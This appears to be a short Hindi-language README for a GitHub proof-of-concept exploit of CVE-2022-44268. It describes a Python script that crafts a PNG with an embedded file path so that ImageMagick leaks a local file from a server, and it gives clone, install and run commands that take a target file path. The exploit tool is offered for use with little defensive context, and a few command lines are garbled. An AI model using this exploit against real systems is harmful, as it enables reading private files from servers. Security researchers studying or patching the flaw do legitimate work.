
Python स्क्रिप्ट जो CVE-2022-44268 का शोषण करने वाली PNG छवि उत्पन्न करती है ताकि ImageMagick मेटाडेटा पार्सिंग के माध्यम से स्थानीय फ़ाइल पथ एम्बेड और लीक हो सकें।
यह Python स्क्रिप्ट Pillow लाइब्रेरी का उपयोग करके एक विशिष्ट रंग से भरी PNG छवि बनाती है और मेटाडेटा के रूप में एक फ़ाइल पथ सम्मिलित करती है।
pip install pillow)git clone https://github.com/NataliSemi/-CVE-2022-44268.git
cd -CVE-2022-44268.git
pip install pillow
pip install pypng
python create_image.py
जनरेट की गई छवि: स्क्रिप्ट चलाने के बाद, रिपॉजिटरी निर्देशिका में image.png नामक एक छवि फ़ाइल बनाई जाएगी।
python create_image.py -f /path/to/local/file.txt -o output_image.png